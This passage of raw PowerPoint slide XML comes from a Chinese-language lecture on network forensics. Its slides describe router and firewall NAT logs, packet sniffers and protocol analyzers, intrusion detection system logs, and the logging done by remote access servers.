                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>完成网络地址转换（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>NAT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>）的基于网络的防火墙和路由器还包含其他有价值的信息。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>NAT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>设备记录每一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>NAT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>地址和端口映射。一些防火墙兼有代理服务器功能。代理服务器会将每一个连接的基本信息记入日志。一些代理服务器是专用的，而且进行一些应用层协议的分析和验证，例如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>。代理服务器会拒绝明显无效的客户端请求并将其记入日志。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>         下</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>图显示了典型的路由器日志。</a:t>
            </a:r>
          </a:p>
          <a:p>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endParaRPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="72706" name="Picture 2" descr="firewall_log1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1403648" y="2211710"/>
            <a:ext cx="5838825" cy="235267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6.1.1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="black">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:prstClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>网络取证的定义和特点</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:prstClr val="black">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:prstClr>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本框 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="971600" y="1491630"/>
            <a:ext cx="7165712" cy="1300356"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="68580" tIns="34290" rIns="68580" bIns="34290" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>“网络取证”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>(Network Forensics)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>一词在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>90</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>年代由计算机安全专家</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Marcus </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Ranum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>最早提出的，但由于当时网络的应用范围还很有限，早期用的更多的术语则是数字取证或电子取证。区别于计算机取证与司法鉴定，网络取证是指针对涉及民事、刑事和管理事件而进行的对网络数据流的研究，目的是保护用户和资源，防范由于持续膨胀的网络连接而产生的被非法利用、入侵以及其他犯罪行为。术语“网络数据流”指的是在主机之间通过无线或者有线方式进行的计算机网络通信。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1"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6.3.2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="black">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:prstClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>数据包嗅探器和协议分析器</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:prstClr val="black">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:prstClr>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1027" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="971600" y="826603"/>
            <a:ext cx="6840760" cy="3093154"/>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en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>数据包嗅探器（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Packet Sniffers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>）</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>用来监视有线或无线网的网络通信并捕获数据包。通过将</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>NIC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>设定为混杂模式（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>promiscuous mode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>），数据包嗅探器捕获所有的数据包，或者仅仅是特定的数据包（例如某个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>TCP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>端口，某个源或者目的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>地址）。数据包嗅探器一般用来捕获特定类型数据以协助排除网络故障或者取证调查。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>很多数据包嗅探器同时也是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>协议分析器（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Protocol Analyzers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>），</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>能把分散的数据包重组为数据通信，进而识别通信，即使这个通信使用了成百上千种协议中的一个。协议分析器不仅能处理实时数据通信，也能够分析数据包嗅探器事先捕获并保存为捕获文件的数据通信。协议分析器在分析不明格式的原始数据包时格外有用。</a:t>
            </a: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6.3.3 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="black">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:prstClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>入侵检测系统</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:prstClr val="black">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:prstClr>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1027" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="899592" y="627534"/>
            <a:ext cx="7200800" cy="2585323"/>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zh-CN" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>网络型入侵检测系统（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>IDS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Intrusion Detection System</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>）</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>通过执行数据报嗅探和网络通信分析来识别可疑活动并记录相关信息，其传感器会监视特定网络段的所有网络通信；主机型入侵检测系统监视特定系统的现象和发生的事件，也包括网络数据，它仅仅监视与自身有关的网络通信。对每一个可疑的事件，入侵检测系统除了记录基本事件特征外，还记录应用层信息（例如用户名、文件名、命令、状态代码等），以及表明活动可能目的的信息，例如攻击的类型（比如缓冲溢出）、针对的漏洞、攻击是否成功等。一个典型的入侵检测日志见</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>下</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>图。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="73730" name="Picture 2" descr="clip_image021"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2627784" y="2571750"/>
            <a:ext cx="3744416" cy="2109196"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3851920" y="4659982"/>
            <a:ext cx="1107996" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>入侵检测记录</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="1100" b="1"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6.3.4 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="black">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:prstClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>远程访问</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:prstClr val="black">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:prstClr>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1027" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="899592" y="915566"/>
            <a:ext cx="7200800" cy="3000821"/>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en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>远程访问</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>    远程访问服务器，例如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>VPN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>网关和调制解调服务器（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Modem Servers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>）等，提供了网络之间的连接能力，例如外部的系统通过远程访问服务器连接到内部系统，以及内部的系统连接到外部系统或者内部系统。远程访问服务器通常记录每一个连接的产生，以及每个会话属于哪一个授权的账号。如果远程访问服务器还为远程用户分配</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>地址，同样也会记入日志。一些远程访问服务器提供包过滤功能，这时的日志记载情况与防火墙和路由器的情况类似。远程访问服务器工作在网络层，支持多种不同的应用层实现。由于远程访问服务器并不理解这些应用程序的功能，所以它基本不记载任何具体应用程序的数据。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>    此外，网络中还经常存在很多其他特殊的应用程序，用来提供到某个特定主机系统的远程访问，例如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SSH</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Telnet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、终端服务、远程控制软件、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Client/Server</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>应用程序等。这些应用软件也可以合理地配置，记录每一个连接的基本信息。</a:t>
            </a:r>
